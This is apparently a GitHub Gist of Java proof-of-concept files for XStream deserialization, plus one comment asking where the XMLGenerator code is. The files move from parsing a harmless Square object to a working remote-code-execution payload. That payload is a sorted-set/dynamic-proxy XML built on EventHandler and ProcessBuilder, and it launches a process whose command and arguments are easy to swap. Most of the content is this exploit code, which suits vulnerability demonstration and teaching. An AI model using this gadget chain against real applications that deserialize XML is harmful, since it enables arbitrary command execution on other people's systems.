Last active
March 11, 2021 03:27
-
-
Save DinisCruz/8077118 to your computer and use it in GitHub Desktop.
Script examples of XStream PoCs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.IOException; | |
public class PoC_XMLGenerator | |
{ | |
public static void main(String[] args) throws IOException | |
{ | |
String process = "open"; | |
String arguments = "/Applications/Calculator.app"; | |
String payload = "<sorted-set>" + | |
"<string>foo</string>" + | |
"<dynamic-proxy>" + | |
"<interface>java.lang.Comparable</interface>" + | |
"<handler class=\"java.beans.EventHandler\">" + | |
" <target class=\"java.lang.ProcessBuilder\">" + | |
" <command>" + | |
" <string>" + process + "</string>" + | |
" <string>" + arguments + "</string>" + | |
" </command>" + | |
" </target>" + | |
" <action>start</action>" + | |
"</handler>" + | |
"</dynamic-proxy>" + | |
"</sorted-set>"; | |
XMLGenerator.generateTOfromXML(payload); | |
System.out.println("Will not get here"); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class XStreamPoC { | |
public static void main(String[] args) | |
{ | |
Square sq = new Square(); | |
sq.setSize(5); | |
String resultXML = XMLGenerator.generateXML(sq); | |
System.out.println(String.format("resultXML: \n \n%s \n\n", resultXML)); | |
String inputXML = resultXML; | |
Square sq1 = (Square)XMLGenerator.generateTOfromXML(inputXML); | |
System.out.println(String.format("sq1: \n \n%s \n\n", sq1)); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class XStreamPoC { | |
public static void main(String[] args) | |
{ | |
String payload = "<square>"+ | |
" <size>5</size>"+ | |
"</square> "; | |
String inputXML = payload; | |
Square sq1 = (Square)XMLGenerator.generateTOfromXML(inputXML); | |
System.out.println(String.format("sq1: \n \n%s \n\n", sq1)); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import com.thoughtworks.xstream.XStream; | |
import com.thoughtworks.xstream.io.xml.DomDriver; | |
public class XStreamPoC { | |
public static void main(String[] args) | |
{ | |
String payload = "<square>"+ | |
" <size>5</size>"+ | |
"</square> "; | |
String inputXML = payload; | |
//Square sq1 = (Square)XMLGenerator.generateTOfromXML(inputXML); | |
//the next code is what the XMLGenerator.generateTOfromXML is doing: | |
XStream xstream = new XStream(new DomDriver()) | |
{{ | |
processAnnotations(Square.class); | |
processAnnotations(Rectangle.class); | |
}}; | |
Square sq1 = (Square)xstream.fromXML(inputXML); | |
System.out.println(String.format("sq1: \n \n%s \n\n", sq1)); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class XStreamPoC { | |
public static void main(String[] args) | |
{ | |
String payload = "<string>"+ | |
" Hello"+ | |
"</string> "; | |
String inputXML = payload; | |
//Square sq1 = (Square)XMLGenerator.generateTOfromXML(inputXML); | |
Object sq1 = XMLGenerator.generateTOfromXML(inputXML); | |
System.out.println(String.format("sq1 value: %s \n\nsq1 class: %s", sq1, sq1.getClass())); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class XStreamPoC { | |
public static void main(String[] args) | |
{ | |
String payload = "<com.thoughtworks.xstream.InitializationException>"+ | |
" Hello XStream Exception object"+ | |
"</com.thoughtworks.xstream.InitializationException> "; | |
String inputXML = payload; | |
//Square sq1 = (Square)XMLGenerator.generateTOfromXML(inputXML); | |
Object sq1 = XMLGenerator.generateTOfromXML(inputXML); | |
System.out.println(String.format("sq1 value: %s \n\nsq1 class: %s", sq1, sq1.getClass())); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class XStreamPoC { | |
public static void main(String[] args) | |
{ | |
String payload = "<java.lang.ProcessBuilder>"+ | |
" <command>ExecuteMe</command>"+ | |
"</java.lang.ProcessBuilder>"; | |
String inputXML = payload; | |
Square sq1 = (Square)XMLGenerator.generateTOfromXML(inputXML); | |
//Object sq1 = XMLGenerator.generateTOfromXML(inputXML); | |
System.out.println(String.format("sq1 value: %s \n\nsq1 class: %s", sq1, sq1.getClass())); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.beans.EventHandler; | |
import java.util.Set; | |
import java.util.TreeSet; | |
public class XStreamPoC { | |
public static void main(String[] args) | |
{ | |
Set<Comparable> set = new TreeSet<Comparable>(); | |
set.add("foo"); | |
set.add(EventHandler.create(Comparable.class, | |
new ProcessBuilder("open","/Applications/Calculator.app"), "start")); | |
String setXml = XMLGenerator.generateXML(set); | |
/*String payload = "<java.lang.ProcessBuilder>"+ | |
" <command>ExecuteMe</command>"+ | |
"</java.lang.ProcessBuilder>"; | |
String inputXML = payload; | |
Square sq1 = (Square)XMLGenerator.generateTOfromXML(inputXML); | |
//Object sq1 = XMLGenerator.generateTOfromXML(inputXML); | |
System.out.println(String.format("sq1 value: %s \n\nsq1 class: %s", sq1, sq1.getClass())); | |
*/ | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class XStreamPoC { | |
public static void main(String[] args) | |
{ | |
/*Set<Comparable> set = new TreeSet<Comparable>(); | |
set.add("foo"); | |
set.add(EventHandler.create(Comparable.class, | |
new ProcessBuilder("open","/Applications/Calculator.app"), "start")); | |
String setXml = XMLGenerator.generateXML(set);*/ | |
String process = "open"; | |
String arguments = "/Applications/Calculator.app"; | |
String payload = "<sorted-set>" + | |
"<string>foo</string>" + | |
"<dynamic-proxy>" + | |
"<interface>java.lang.Comparable</interface>" + | |
"<handler class=\"java.beans.EventHandler\">" + | |
" <target class=\"java.lang.ProcessBuilder\">" + | |
" <command>" + | |
" <string>" + process + "</string>" + | |
" <string>" + arguments + "</string>" + | |
" </command>" + | |
" </target>" + | |
" <action>start</action>" + | |
"</handler>" + | |
"</dynamic-proxy>" + | |
"</sorted-set>"; | |
String inputXML = payload; | |
Square sq1 = (Square)XMLGenerator.generateTOfromXML(inputXML); | |
//Object sq1 = XMLGenerator.generateTOfromXML(inputXML); | |
System.out.println(String.format("sq1 value: %s \n\nsq1 class: %s", sq1, sq1.getClass())); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi, wondering where could I find the coding done for "XMLGenerator.generateTOfromXML(payload);"